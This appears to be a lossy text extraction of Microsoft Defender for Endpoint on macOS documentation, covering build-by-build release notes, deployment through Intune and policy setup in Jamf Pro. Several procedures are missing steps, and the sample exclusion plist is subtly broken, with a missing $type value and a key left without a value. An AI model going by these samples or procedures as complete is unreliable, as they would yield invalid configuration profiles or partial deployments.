this OS change isn't included in the final release of macOS 12.2, it's likely that it will
be reintroduced in a future macOS version. As such, we encourage all enterprise
administrators to refresh the Microsoft Defender for Endpoint package in their
management console to this product version (or a newer version).
Addressed an issue seen on some M1 devices where the product was stuck with
invalid anti-malware definitions and couldn't successfully update to a working set
of definitions.
mdatp health output has been extended with a more attribute called
full_disk_access_enabled that can be used to determine whether Full Disk Access
has been granted to all components of Microsoft Defender for Endpoint for Mac.

Build: 101.54.16
What's new
macOS 10.14 (Mojave) is no longer supported

After a product setting stops being managed by the administrator through MDM,
it now reverts to the value it had before it was managed (the value configured
locally by the end user or, if no such local value was explicitly provided, the default
value used by the product). Prior to this change, after a setting stopped being
managed, its managed value persisted and was still used by the product.
Build: 101.49.25
What's new
Added a new switch to the command-line tool to control whether archives are
scanned during on-demand scans. This can be configured through mdatp config
scan-archives --value [enabled/disabled] . By default, this is set to enabled.
Bug fixes
Build: 101.47.27
What's new
Fix for a system freeze occurring on shutdown on macOS Mojave and macOS
Catalina.
Build: 101.43.84
What's new
Candidate build for macOS 12 (Monterey)

Bug fixes
Build: 101.41.10
What's new
Added new switches to the command-line tool:

Control degree of parallelism for on-demand scans. This can be configured
through mdatp config maximum-on-demand-scan-threads --value [number-
between-1-and-64] . By default, a degree of parallelism of 2 is used.
Control whether scans after security intelligence updates are enabled or

disabled. This can be configured through mdatp config scan-after-definition-
update --value [enabled/disabled] . By default, this is set to enabled.
Changing the product log level now requires elevation.

Build: 101.40.84
What's new
M1 chip native support

Build: 101.37.97
What's new
Build: 101.34.28
What's new
Bug fixes
Build: 101.34.27
What's new
Bug fixes
Build: 101.34.20
What's new
Device control for macOS is now in general availability.

Addressed an issue where a quick scan couldn't be started from the status menu
on macOS 11 (Big Sur).
Other bug fixes
Build: 101.32.69
What's new
Addressed an issue where concurrent access to the keychain from Microsoft

Defender for Endpoint and other applications can lead to keychain corruption.
Build: 101.29.64
What's new
Starting with this version, threats detected during on-demand antivirus scans
triggered through the command-line client are automatically remediated. Threats
detected during scans triggered through the user interface still require manual
action.
mdatp diagnostic real-time-protection-statistics now supports two other
switches:
--sort : sorts the output descending by total number of files scanned
--top N : displays the top N results (only works if --sort is also specified)
Performance improvements (specifically for when YARN is used) & bug fixes
Build: 101.27.50
What's new
Fix to accommodate for Apple certificate expiration for macOS Catalina and earlier.
This fix restores Microsoft Defender Vulnerability Management (MDVM)
functionality.
Build: 101.25.69
What's new
Microsoft Defender for Endpoint on macOS is now available in preview for US

Government customers. For more information, see Microsoft Defender for
Endpoint for US Government customers.
Performance improvements (specifically for the situation when the XCode
Simulator app is used) & bug fixes.
Build: 101.23.64
What's new
Added a new option to the command-line tool to view information about the last
on-demand scan. To view information about the last on-demand scan, run mdatp
health --details antivirus .
Build: 101.22.79
What's new
Build:101.19.88
What's new
Build: 101.19.48
What's new
７ Note
The old command-line tool syntax has been deprecated with this release. For
information on the new syntax, see Resources.
Added a new command-line switch to disable the network extension: mdatp

system-extension network-filter disable . This command can be useful to
troubleshoot networking issues that could be related to Microsoft Defender for
Endpoint on Mac.
Build: 101.19.21
What's new
Bug fixes
Build: 101.15.26
What's new
Improved the reliability of the agent when running on macOS 11 Big Sur.
Added a new command-line switch ( --ignore-exclusions ) to ignore AV exclusions
during custom scans ( mdatp scan custom ).
Build: 101.13.75
What's new
Removed conditions when Microsoft Defender for Endpoint was triggering a

macOS 11 (Big Sur) bug that manifests into a kernel panic.
Fixed a memory leak in the Endpoint Security system extension when running on
mac 11 (Big Sur).
Bug fixes
Build: 101.10.72
What's new
Bug fixes
Build: 101.09.61
What's new
Added a new managed preference for disabling the option to send feedback.
Status menu icon now shows a healthy state when the product settings are
managed. Previously, the status menu icon was displaying a warning or error state,
even though the product settings were managed by the administrator.
Build: 101.09.50
What's new
This product version has been validated on macOS Big Sur 11 preview 9.
The new syntax for the mdatp command-line tool is now the default one. For more
information on the new syntax, see Resources for Microsoft Defender for Endpoint
on macOS.
７ Note
The old command-line tool syntax will be removed from the product on January
1st, 2021.
Extended mdatp diagnostic create with a new parameter ( --path [directory] )

that allows the diagnostic logs to be saved to a different directory.
Build: 101.09.49
What's new
User interface improvements to differentiate exclusions that are managed by the IT

administrator versus exclusions defined by the local user.
Improved CPU utilization during on-demand scans.
Build: 101.07.23
What's new
Added new fields to the output of mdatp --health for checking the status of
passive mode and the EDR group ID.
７ Note
mdatp --health will be replaced with mdatp health in a future product update.
Fixed a bug where automatic sample submission wasn't marked as managed in the
user interface.
Added new settings for controlling the retention of items in the antivirus scan
history. You can now specify the number of days to retain items in the scan history
and specify the maximum number of items in the scan history.
Bug fixes
Build: 101.06.63
What's new
Addressed a performance regression introduced in version 101.05.17 . The

regression was introduced with the fix to eliminate the kernel panics some
customers have observed when accessing SMB shares. We have reverted this code
change and are investigating alternative ways to eliminate the kernel panics.
Build: 101.05.17
What's new
） Important
We are working on a new and enhanced syntax for the mdatp command-line tool.
The new syntax is currently the default in the Insider Fast and Insider Slow update
channels. We encourage you to familiarize yourself with this new syntax. We will
continue supporting the old syntax in parallel with the new syntax and will provide
more communication around the deprecation plan for the old syntax in the
upcoming months.
Addressed a kernel panic that occurred sometimes when accessing SMB file shares.
Build: 101.05.16
What's new
Improvements to quick scan logic to significantly reduce the number of scanned

files.
Added autocompletion support for the command-line tool.
Bug fixes
Build: 101.03.12
What's new
Build: 101.01.54
What's new
Improvements around compatibility with Time Machine

Accessibility improvements
Build: 101.00.31
What's new
Improved product onboarding experience for Intune users

Antivirus exclusions now support wildcards
Added the ability to trigger antivirus scans from the macOS contextual menu. You
can now right-click a file or a folder in Finder and select Scan with Microsoft
In-place product downgrades are now explicitly disallowed by the installer. If you
need to downgrade, first uninstall the existing version and reconfigure your device.
Build: 100.90.27
What's new
You can now set an update channel for Microsoft Defender for Endpoint on macOS
that is different from the system-wide update channel.
New product icon
Other user experience improvements
Bug fixes
Build: 100.86.92
What's new
Improvements around compatibility with Time Machine

Addressed an issue where the product was sometimes not cleaning all files under
/Library/Application Support/Microsoft/Defender during uninstallation.
Reduced the CPU utilization of the product when Microsoft products are updated
through Microsoft AutoUpdate.
Build: 100.86.91
What's new
Ｕ Caution
To ensure the most complete protection for your macOS devices and in alignment
with Apple stopping delivery of macOS native security updates to OS versions older
than [current - 2], MDATP for Mac deployment and updates will no longer be
supported on macOS Sierra [10.12]. MDATP for Mac updates and enhancements
will be delivered to devices running versions Catalina [10.15], Mojave [10.14], and
High Sierra [10.13].
If you already have MDATP for Mac deployed to your Sierra [10.12] devices, please
upgrade to the latest macOS version to eliminate risks of losing protection.
Build: 100.83.73
What's new
Added more controls for IT administrators around management of exclusions,

management of threat type settings, and disallowed threat actions.
When Full Disk Access isn't enabled on the device, a warning is now displayed in
the status menu.
Build: 100.82.60
What's new
Addressed an issue where the product fails to start following a definition update.
Build: 100.80.42
What's new
Bug fixes
Build: 100.79.42
What's new
Fixed an issue where Microsoft Defender for Endpoint on Mac was sometimes
interfering with Time Machine.
Added a new switch to the command-line utility for testing the connectivity with
the backend service
Bash
Added ability to view the full threat history in the user interface (can be accessed
from the Protection history view).
Build: 100.72.15
What's new
Bug fixes
Build: 100.70.99
What's new
Addressed an issue that impacts the ability of some users to upgrade to macOS
Catalina when real-time protection is enabled. This sporadic issue was caused by
Microsoft Defender for Endpoint locking files within Catalina upgrade package
while scanning them for threats, which led to failures in the upgrade sequence.
Build: 100.68.99
What's new
Added the ability to configure the antivirus functionality to run in passive mode.
Build: 100.65.28
What's new
Added support for macOS Catalina.
Ｕ Caution
macOS 10.15 (Catalina) contains new security and privacy enhancements. Beginning
with this version, by default, applications are not able to access certain locations on
disk (such as Documents, Downloads, Desktop, etc.) without explicit consent. In the
absence of this consent, Microsoft Defender for Endpoint is not able to fully protect
your device.
The mechanism for granting this consent depends on how you deployed Microsoft
Defender for Endpoint:
For manual deployments, see the updated instructions in the Manual

deployment topic.
For managed deployments, see the updated instructions in the JAMF-based
deployment and Microsoft Intune-based deployment topics.

 Tip
Feedback

Deploy Microsoft Defender for Endpoint
on macOS with Microsoft Intune
Article • 12/08/2023
Applies to:

Microsoft Defender for business
This article describes how to deploy Microsoft Defender for Endpoint on macOS through
Microsoft Intune. A successful deployment requires the completion of all of the
following steps:
1. Approve system extension

2. Network Filter
3. Full Disk Access
4. Background services
5. Notifications
6. Accessibility settings
7. Microsoft AutoUpdate
8. Microsoft Defender for Endpoint configuration settings
9. Network protection for Microsoft Defender for Endpoint on macOS
10. Device control for Microsoft Defender for Endpoint on macOS
11. Data Loss Prevention for Endpoint
12. Check status of the PList(.mobileconfig)
13. Publish application
14. Download the onboarding package
15. Deploy the onboarding package
Prerequisites and system requirements

Before you get started, see the main Microsoft Defender for Endpoint on macOS page
for a description of prerequisites and system requirements for the current software
version.
Overview
The following table summarizes the steps you would need to take to deploy and
manage Microsoft Defender for Endpoint on Macs, via Microsoft Intune. See the
following table for more detailed steps.
ﾉ Expand table
Step Sample file name Bundle identifier
Approve sysext.mobileconfig N/A

system
extension
Network netfilter.mobileconfig N/A

extension
policy
Full Disk fulldisk.mobileconfig com.microsoft.wdav.epsext

Access
Microsoft MDE_MDAV_and_exclusion_settings_Preferences.xml com.microsoft.wdav

Defender for
Endpoint
configuration
settings
Note: If
you're
planning to
run a third-
party AV for
macOS, set
passiveMode
to true.
Background background_services.mobileconfig N/A

services
Configure notif.mobileconfig com.microsoft.wdav.tray

Microsoft
Defender for
Endpoint
notifications
Accessibility accessibility.mobileconfig com.microsoft.dlp.daemon

settings
Configure com.microsoft.autoupdate2.mobileconfig com.microsoft.autoupdate2

Microsoft
AutoUpdate
(MAU)
Step Sample file name Bundle identifier
Device DeviceControl.mobileconfig N/A

Control
Data Loss DataLossPrevention.mobileconfig N/A

Prevention
Download WindowsDefenderATPOnboarding__MDATP_wdav.atp.xml com.microsoft.wdav.atp

the
onboarding
package
Deploy the Wdav.pkg N/A

Microsoft
Defender for
Endpoint on
macOS
application
Create system configuration profiles

The next step is to create system configuration profiles that Microsoft Defender for
Endpoint needs. In the Microsoft Intune admin center , open Devices > Configuration
profiles.
Step 1: Approve system extensions

1. In Microsoft Defender portal, go to Settings > Endpoints > Device management
> Onboarding.
This profile is needed for Big Sur (11) or later. It is ignored on older macOS since
they use the kernel extension.
2. Under Configuration profiles, select Create Profile.
3. Under Platform, select macOS.
4. Under Profile type, select Templates.
5. Under Template name, select Extensions.
6. Click Create.
7. On the Basics tab, Name the profile. For example, 'SysExt-prod-macOS-Default-

MDE'.
8. Click Next.
9. On the Configuration settings tab, expand System Extensions and add the
following entries in the Allowed system extensions section:
ﾉ Expand table
Bundle identifier Team identifier
com.microsoft.wdav.epsext UBF8T346G9
com.microsoft.wdav.netext UBF8T346G9
10. On the Assignments tab, assign the profile to a group where the macOS devices
and/or users are located, or All Users and All devices.
11. Review the configuration profile. Click Create.
Step 2: Network filter

As part of the Endpoint Detection and Response capabilities, Microsoft Defender for
Endpoint on macOS inspects socket traffic and reports this information to the Microsoft
365 Defender portal. The following policy allows the network extension to perform this
functionality.
Download netfilter.mobileconfig from GitHub repository .
To configure network filter:

4. Under Template name, select Custom.
5. Click Create.
6. On the Basics tab, Name the profile. For example, 'NetFilter-prod-macOS-Default-
MDE'.
7. Click Next.
8. On the Configuration settings tab, enter a Custom configuration profile name.
For example, 'NetFilter-prod-macOS-Default-MDE'.
9. Choose a Deployment channel.
10. Click Next.
Step 3: Full Disk Access
７ Note
Starting with macOS Catalina (10.15) or newer, in order to provide privacy for the
end-users, it created the FDA (Full Disk Access). Enabling TCC (Transparency,
Consent & Control) through a Mobile Device Management solution such as Intune,
will eliminate the risk of Defender for Endpoint losing Full Disk Access
Authorization to function properly.
This configuration profile grants Full Disk Access to Microsoft Defender for
Endpoint. If you previously configured Microsoft Defender for Endpoint through
Intune, we recommend you update the deployment with this configuration profile.
Download fulldisk.mobileconfig from GitHub repository .
To configure Full Disk Access:

5. Click Create.
6. On the Basics tab, Name the profile. For example, 'FullDiskAccess-prod-macOS-
Default-MDE'.
7. Click Next.
For example, 'Fulldisk.mobileconfig'.
10. Click Next.
11. Select a Configuration profile file.
Step 4: Background services
Ｕ Caution
macOS 13 (Ventura) contains new privacy enhancements. Beginning with this

version, by default, applications cannot run in background without explicit consent.
Microsoft Defender for Endpoint must run its daemon process in background.
This configuration profile grants Background Service permissions to Microsoft

Defender for Endpoint. If you previously configured Microsoft Defender for
Endpoint through Microsoft Intune, we recommend you update the deployment
with this configuration profile.
Download background_services.mobileconfig from GitHub repository .
To configure background services:

5. Click Create.
Default-MDE'.
7. Click Next.
For example, 'Fulldisk.mobileconfig'.
10. Click Next.
Step 5: Notifications
This profile is used to allow Microsoft Defender for Endpoint on macOS and Microsoft
AutoUpdate to display notifications in UI.
Download notif.mobileconfig from GitHub repository .
To turn off notifications for the end users, you can change 'Show NotificationCenter'
from 'true' to 'false' in notif.mobileconfig .
To configure notifications:

5. Click Create.
Default-MDE'.
7. Click Next.
For example, 'Notification.mobileconfig'.
10. Click Next.
Step 6: Accessibility settings

This profile is used to allow Microsoft Defender for Endpoint on macOS to access the
accessibility settings on Apple macOS High Sierra (10.13.6) and newer.
Download accessibility.mobileconfig from GitHub repository .

5. Click Create.
6. On the Basics tab, Name the profile. For example, 'Accessibility-prod-macOS-
Default-MDE'.
7. Click Next.
For example, 'Accessibility.mobileconfig'.
10. Click Next.
Step 7: Microsoft AutoUpdate

This profile is used to update the Microsoft Defender for Endpoint on macOS via
Microsoft AutoUpdate (MAU). If you're deploying Microsoft Defender for Endpoint on
macOS, you have the options to get an updated version of the application (Platform
Update) that are in the different channels mentioned here:
Beta (Insiders-Fast)
Current channel (Preview, Insiders-Slow)
Current channel (Production)
For more information, see Deploy updates for Microsoft Defender for Endpoint on
macOS.
Download AutoUpdate2.mobileconfig from GitHub repository .
７ Note
The sample AutoUpdate2.mobileconfig from the GitHub repository has it set to

Current Channel (Production).

5. Click Create.
6. On the Basics tab, Name the profile. For example, 'Autoupdate-prod-macOS-
Default-MDE'.
7. Click Next.
For example, 'Autoupdate.mobileconfig'.
10. Click Next.
Step 8: Microsoft Defender for Endpoint configuration

settings
In this step, we'll go over the "Preferences," which enables you to configure anti-
malware and edr policies using Microsoft Defender portal and Microsoft Intune.
Set policies using Microsoft Defender portal
Go through Configure Microsoft Defender for Endpoint in Intune before setting the
security policies using Microsoft Defender.
In the Microsoft Defender portal :
1. Go to Configuration management > Endpoint security policies > Mac policies >
Create new policy.
2. Under Select Platform, select macOS.
3. Under Select Template, choose a template and click Create Policy.
4. Enter the Name and Description of the policy.
5. Click Next.
6. On the Assignments tab,assign the profile to a group where the macOS devices
For more information about managing security settings, see:
Manage Microsoft Defender for Endpoint on devices with Microsoft Intune

Manage security settings for Windows, macOS, and Linux natively in Defender for
Endpoint
Set policies using Microsoft Intune

You can manage the security settings for Microsoft Defender for Endpoint on macOS
under Setting Preferences in Microsoft Intune.
For more information, see Set preferences for Microsoft Defender for Endpoint on Mac.
Step 9: Network protection for Microsoft Defender for

Endpoint on macOS
In the Microsoft Defender portal :
1. Go to Configuration management > Endpoint security policies > Mac policies >
Create new policy.
2. Under Select Platform, select macOS.
3. Under Select Template, select Microsoft Defender Antivirus and click Create
Policy.

4. On the Basics tab, enter the Name and Description of the policy. Click Next.
5. On the Configuration Settings tab, under Network Protection, select an

Enforcement level. Click Next.
6. On the Assignments tab,assign the profile to a group where the macOS devices
7. Review the policy in Review+Create and click Save.

 Tip
You can also configure network protection by appending the information from
Network protection to help prevent macOS connections to bad sites to the
.mobileconig from step 8.
Step 10: Device Control for Microsoft Defender for

Endpoint on macOS
To set Device Control for Microsoft Defender for Endpoint on macOS, follow the steps
in:
Device Control for macOS

Deploy and manage Device Control using Intune
Step 11: Data Loss Prevention (DLP) for Endpoint

To set Purview's Data Loss Prevention (DLP) for endpoint on macOS, follow the steps in
Onboard and offboard macOS devices into Compliance solutions using Microsoft
Intune.
Step 12: Check status of PList(.mobileconfig)

After completing the profile configuration, you'll be able to review the status of the
policies.
View Status
Once the Intune changes are propagated to the enrolled devices, you can see them
listed under Monitor > Device status:
Client device setup

A standard Company Portal installation is sufficient for a mac device.
1. Confirm device management.
Select Open System Preferences, locate Management Profile on the list, and
select Approve.... Your Management Profile would be displayed as Verified:

2. Select Continue and complete the enrollment.
You may now enroll more devices. You can also enroll them later, after finishing the
provisioning system configuration and application packages.
3. In Intune, open Manage > Devices > All devices. Here you can see your device
among the listed:
Verify client device state
1. After the configuration profiles are deployed to your devices, open System
Preferences > Profiles on your Mac device.

2. Verify that the following configuration profiles are present and installed. The
Management Profile should be the Intune system profile. Wdav-config and wdav-
kext are system configuration profiles that were added in Intune:

3. You should also see the Microsoft Defender for Endpoint icon in the top-right
corner.
Step 13: Publish application

This step enables deploying Microsoft Defender for Endpoint to enrolled machines.
1. In the Microsoft Intune admin center , open Apps.
2. Select By platform > macOS > Add.
3. Under App type, select macOS. Click Select.


4. On the App information, keep the default values and click Next.
5. On the Assignments tab, click Next.


6. Review and Create. You can visit Apps > By platform > macOS to see it on the list
of all applications.
For more information, see Add Microsoft Defender for Endpoint to macOS devices using
Microsoft Intune.
） Important
You should create and deploy the configuration profiles in the above order (step 1-
13) for a successful system configuration.
Step 14: Download the onboarding package
To download the onboarding packages from Microsoft 365 Defender portal:
1. In the Microsoft 365 Defender portal, go to Settings > Endpoints > Device
management > Onboarding.
2. Set the operating system to macOS and the deployment method to Mobile Device
Management / Microsoft Intune.
3. Select Download onboarding package. Save it as

WindowsDefenderATPOnboardingPackage.zip to the same directory.
4. Extract the contents of the .zip file:
Bash
unzip WindowsDefenderATPOnboardingPackage.zip
Console
Archive: WindowsDefenderATPOnboardingPackage.zip
warning: WindowsDefenderATPOnboardingPackage.zip appears to use
backslashes as path separators
inflating: intune/kext.xml
inflating: intune/WindowsDefenderATPOnboarding.xml
inflating: jamf/WindowsDefenderATPOnboarding.plist

Step 15: Deploy the onboarding package

This profile contains license information for Microsoft Defender for Endpoint, without
which it is reported as not licensed.
To deploy the onboarding package:
5. Click Create.

6. On the Basics tab, Name the profile. For example, 'Autoupdate-prod-macOS-

Default-MDE'. Click Next.

For example, 'Autoupdate.mobileconfig'.
9. Click Next.



13. Open Devices > Configuration profiles to see the created profile.
Step 16: Verify anti-malware detection

See the following article to test for an anti-malware detection review: AV detection test
for verifying device's onboarding and reporting services
Step 17: Verifying EDR detection

See the following article to test for an EDR detection review: EDR detection test for
verifying device onboarding and reporting services
Troubleshooting
Issue: No license found.
Solution: Follow the steps in this article to create a device profile using
WindowsDefenderATPOnboarding.xml.
Logging installation issues

See Logging installation issues for information on how to find the automatically
generated log created by the installer, when an error occurs.
For information on troubleshooting procedures, see:
Troubleshoot system extension issues in Microsoft Defender for Endpoint on

macOS
Troubleshoot installation issues for Microsoft Defender for Endpoint on macOS
Troubleshoot license issues for Microsoft Defender for Endpoint on macOS
Troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on
macOS
Troubleshoot performance issues for Microsoft Defender for Endpoint on macOS
Uninstallation
See Uninstalling for details on how to remove Microsoft Defender for Endpoint on
macOS from client devices.
Recommended content
Add Microsoft Defender for Endpoint to macOS devices using Microsoft Intune
Learn about adding Microsoft Defender for Endpoint to macOS devices using Microsoft
Intune.
Examples of device control policies for Intune

Learn how to use device control policies using examples that can be used with Intune.

Describes how to deploy Microsoft Defender for Endpoint on iOS features.
Deploy Microsoft Defender for Endpoint on iOS with Microsoft Intune

Describes how to deploy Microsoft Defender for Endpoint on iOS using an app.
Configure Microsoft Defender for Endpoint in Microsoft Intune

Describes connecting to Defender for Endpoint, onboarding devices, assigning
compliance for risk levels, and conditional access policies.
Troubleshoot issues and find answers on FAQs related to Microsoft Defender for
Endpoint on iOS
Troubleshooting and FAQ - Microsoft Defender for Endpoint on iOS.

Describes how to configure Microsoft Defender for Endpoint on Android.
Manage Defender for Endpoint on Android devices in Intune - Azure

Configure Microsoft Defender for Endpoint web protection on Android devices
managed by Microsoft Intune.
 Tip
Feedback

Deploying Microsoft Defender for
Endpoint on macOS with Jamf Pro
Article • 11/15/2023
Applies to:

Learn how to deploy Microsoft Defender for Endpoint on macOS with Jamf Pro.
） Important
This article contains information about third-party tools. This is provided to help
complete integration scenarios, however, Microsoft does not provide
troubleshooting support for third-party tools.
Contact the third-party vendor for support.
This is a multi-step process. You'll need to complete all of the following steps:
Login to the Jamf Portal

Setup the Microsoft Defender for Endpoint on macOS device groups in Jamf Pro
Setup the Microsoft Defender for Endpoint on macOS policies in Jamf Pro
Enroll the Microsoft Defender for Endpoint on macOS devices into Jamf Pro
２ Warning

 Tip
Feedback

Sign in to Jamf Pro
Article • 02/21/2024
Applies to:

1. Enter your credentials.
2. Select Computers.

3. You see the settings that are available.
Next step
Setup the device groups in Jamf Pro
 Tip
Feedback

Set up Microsoft Defender for Endpoint
on macOS device groups in Jamf Pro
Article • 11/15/2023
Applies to:

７ Note
Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
Set up the device groups similar to Group policy organizational unite (OUs), Microsoft
Endpoint Configuration Manager's device collection, and Intune's device groups.
1. Navigate to Static Computer Groups.
2. Select New.
3. Provide a display name and select Save.


4. Now you will see the Contoso's Machine Group under Static Computer Groups.
７ Note
You are not required to use static groups. It is often more convenient and flexible
to use e.g. JAMF Pro's smart groups instead.
Next step
Set up Microsoft Defender for Endpoint on macOS policies in Jamf Pro
 Tip
Feedback

Set up the Microsoft Defender for
Endpoint on macOS policies in Jamf Pro
Article • 02/07/2023
Applies to:
Defender for Endpoint on Mac

This page will guide you through the steps you need to take to set up macOS policies in
Jamf Pro.
You'll need to take the following steps:
1. Get the Microsoft Defender for Endpoint onboarding package

2. Create a configuration profile in Jamf Pro using the onboarding package
3. Configure Microsoft Defender for Endpoint settings
4. Configure Microsoft Defender for Endpoint notification settings
5. Configure Microsoft AutoUpdate (MAU)
6. Grant full disk access to Microsoft Defender for Endpoint
7. Approve System extensions for Microsoft Defender for Endpoint
8. Configure Network Extension
9. Configure Background Services
10. Schedule scans with Microsoft Defender for Endpoint on macOS
11. Deploy Microsoft Defender for Endpoint on macOS
Step 1: Get the Microsoft Defender for Endpoint

onboarding package
1. In Microsoft Defender XDR , navigate to Settings > Endpoints > Onboarding.
2. Select macOS as the operating system and Mobile Device Management / Microsoft
Intune as the deployment method.

3. Select Download onboarding package

(WindowsDefenderATPOnboardingPackage.zip).
4. Extract WindowsDefenderATPOnboardingPackage.zip .
5. Copy the file to your preferred location. For example,

C:\Users\JaneDoe_or_JohnDoe.contoso\Downloads\WindowsDefenderATPOnboardingPack
age_macOS_MDM_contoso\jamf\WindowsDefenderATPOnboarding.plist .
Step 2: Create a configuration profile in Jamf

Pro using the onboarding package
1. Locate the file WindowsDefenderATPOnboarding.plist from the previous section.
2. Sign in to Jamf Pro, navigate to Computers > Configuration Profiles, and select
New.

3. Enter the following details in the General tab:
Name: MDE onboarding for macOS

Description: MDE EDR onboarding for macOS
Category: None
Distribution Method: Install Automatically
Level: Computer Level
4. Navigate to the Application & Custom Settings page and select Upload > Add.
5. Select Upload File (PLIST file) then in Preference Domain enter:

com.microsoft.wdav.atp .

6. Select Open and select the onboarding file.


7. Select Upload.
8. Select the Scope tab.


9. Select the target computers.

10. Select Save.
11. Select Done.


Step 3: Configure Microsoft Defender for

Endpoint settings
You can either use JAMF Pro GUI to edit individual settings of the Microsoft Defender for
Endpoint configuration, or use the legacy method by creating a configuration Plist in a
text editor, and uploading it to JAMF Pro.
Note that you must use exact com.microsoft.wdav as the Preference Domain, Microsoft
Defender for Endpoint uses only this name and com.microsoft.wdav.ext to load its
managed settings!
(The com.microsoft.wdav.ext version may be used in rare cases when you prefer to use
GUI method, but also need to configure a setting that has not been added to the
schema yet.)
GUI method
1. Download schema.json file from Defender's GitHub repository and save it to a
local file:
Bash
curl -o ~/Documents/schema.json
https://raw.githubusercontent.com/microsoft/mdatp-
xplat/master/macos/schema/schema.json
2. Create a new Configuration Profile under Computers -> Configuration Profiles,

enter the following details on the General tab:
Name: MDATP MDAV configuration settings

Description:<blank>
Category: None (default)
Level: Computer Level (default)
Distribution Method: Install Automatically (default)
3. Scroll down to the Application & Custom Settings tab, select External
Applications, click Add and use Custom Schema as Source to use for the
preference domain.

4. Enter com.microsoft.wdav as the Preference Domain, select Add Schema and

Upload the schema.json file downloaded on Step 1. Click Save.
5. You can see all supported Microsoft Defender for Endpoint configuration settings
below, under Preference Domain Properties. Click Add/Remove properties to
select the settings that you want to be managed, and click Ok to save your
changes. (Settings left unselected will not be included into the managed
configuration, an end user will be able to configure those settings on their
machines.)

6. Change values of the settings to desired values. You can click More information to
get documentation for a particular setting. (You may click Plist preview to inspect
what the configuration plist will look like. Click Form editor to return to the visual
editor.)


8. Select Contoso's Machine Group.
9. Select Add, then select Save.
10. Select Done. You'll see the new Configuration profile.


Microsoft Defender for Endpoint adds new settings over time. These new settings will be
added to the schema, and a new version will be published to GitHub. All you need to do
to have updates is to download an updated schema, edit existing configuration profile,
and Edit schema at the Application & Custom Settings tab.
Legacy method
1. Use the following Microsoft Defender for Endpoint configuration settings:
enableRealTimeProtection
passiveMode
７ Note
Not turned on by default, if you are planning to run a third-party AV for

macOS, set it to true .
exclusions
excludedPath
excludedFileExtension
excludedFileName
exclusionsMergePolicy
allowedThreats
７ Note
EICAR is on the sample, if you are going through a proof-of-concept, remove
it especially if you are testing EICAR.
disallowedThreatActions
potentially_unwanted_application
archive_bomb
cloudService
automaticSampleSubmission
tags
hideStatusMenuIcon
For information, see Property list for JAMF full configuration profile.
XML
<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>antivirusEngine</key>
<dict>
<key>enableRealTimeProtection</key>
<true/>
<key>passiveMode</key>
<false/>
<key>exclusions</key>
<array>
<dict>
<key>$type</key>
<string>excludedPath</string>
<key>isDirectory</key>
<false/>
<key>path</key>
<string>/var/log/system.log</string>
</dict>
<dict>
<key>$type</key>
<true/>
<key>path</key>
<string>/home</string>
</dict>
<dict>
<key>$type</key>
<string>excludedFileExtension</string>
<key>extension</key>
<string>pdf</string>
</dict>
<dict>
<key>$type</key>
<string>excludedFileName</string>
<key>name</key>
<string>cat</string>
</dict>
</array>
<key>exclusionsMergePolicy</key>
<string>merge</string>
<key>allowedThreats</key>
<array>
<string>EICAR-Test-File (not a virus)</string>
</array>
<key>disallowedThreatActions</key>
<array>
<string>allow</string>
<string>restore</string>
</array>
<key>threatTypeSettings</key>
<array>
<dict>
<key>key</key>
<string>potentially_unwanted_application</string>
<key>value</key>
<string>block</string>
</dict>
<dict>
<key>key</key>
<string>archive_bomb</string>
<key>value</key>
<string>audit</string>
</dict>
</array>
<key>threatTypeSettingsMergePolicy</key>
</dict>
<key>cloudService</key>
<dict>
<key>enabled</key>
<true/>
<key>diagnosticLevel</key>
<string>optional</string>
<key>automaticSampleSubmission</key>
<true/>
</dict>
<key>edr</key>
<dict>
<key>tags</key>
<array>
<dict>
<key>key</key>
<string>GROUP</string>
<key>value</key>
<string>ExampleTag</string>
</dict>
</array>
</dict>
<key>userInterface</key>
<dict>
<key>hideStatusMenuIcon</key>
<false/>
</dict>
</dict>
</plist>
2. Save the file as MDATP_MDAV_configuration_settings.plist .
3. In the Jamf Pro dashboard, open Computers, and their Configuration Profiles.
Click New and switch to the General tab.
4. Enter the following details on the General tab:
Name: MDATP MDAV configuration settings

Description:<blank>
5. In Application & Custom Settings, select Configure.


6. Select Upload File (PLIST file).

7. In Preferences Domain, enter com.microsoft.wdav , then select Upload PLIST File.
8. Select Choose File.
9. Select the MDATP_MDAV_configuration_settings.plist, then select Open.


10. Select Upload.


７ Note
If you happen to upload the Intune file, you'll get the following error:
11. Select Save.


12. The file is uploaded.



Step 4: Configure notifications settings

These steps are applicable on macOS 11 (Big Sur) or later.
1. In the Jamf Pro dashboard, select Computers, then Configuration Profiles.
2. Click New, and enter the following details in the General tab for Options:
Name: MDATP MDAV Notification settings

Description: macOS 11 (Big Sur) or later

Tab Notifications, click Add, and enter the following values:

Bundle ID: com.microsoft.wdav.tray
Critical Alerts: Click Disable
Notifications: Click Enable
Banner alert type: Select Include and Temporary (default)
Notifications on lock screen: Click Hide
Notifications in Notification Center: Click Display
Badge app icon: Click Display

Tab Notifications, click Add one more time, scroll down to New Notifications
Settings
Bundle ID: com.microsoft.autoupdate.fba
Configure the rest of the settings to the same values as above
Note that now you have two 'tables' with notification configurations, one for
Bundle ID: com.microsoft.wdav.tray, and another for Bundle ID:
com.microsoft.autoupdate.fba. While you can configure alert settings per
your requirements, Bundle IDs must be exactly the same as described before,
and Include switch must be On for Notifications.
3. Select the Scope tab, then select Add.


Step 5: Configure Microsoft AutoUpdate (MAU)
1. Use the following Microsoft Defender for Endpoint configuration settings:
XML

<dict>
<key>ChannelName</key>
<string>Current</string>
<key>HowToCheck</key>
<string>AutomaticDownload</string>
<key>EnableCheckForUpdatesButton</key>
<true/>
<key>DisableInsiderCheckbox</key>
<false/>
<key>SendAllTelemetryEnabled</key>
<true/>
</dict>
</plist>
2. Save it as MDATP_MDAV_MAU_settings.plist .
3. In the Jamf Pro dashboard, select General.
Name: MDATP MDAV MAU settings

Description: Microsoft AutoUpdate settings for MDATP for macOS
Distribution Method: Install Automatically(default)
Level: Computer Level(default)
5. In Application & Custom Settings select Configure.
6. Select Upload File (PLIST file).
7. In Preference Domain enter: com.microsoft.autoupdate2 , then select Upload PLIST

File.
8. Select Choose File.


9. Select MDATP_MDAV_MAU_settings.plist.

10. Select Upload.
11. Select Save.


13. Select Add.


14. Select Done.


Step 6: Grant full disk access to Microsoft

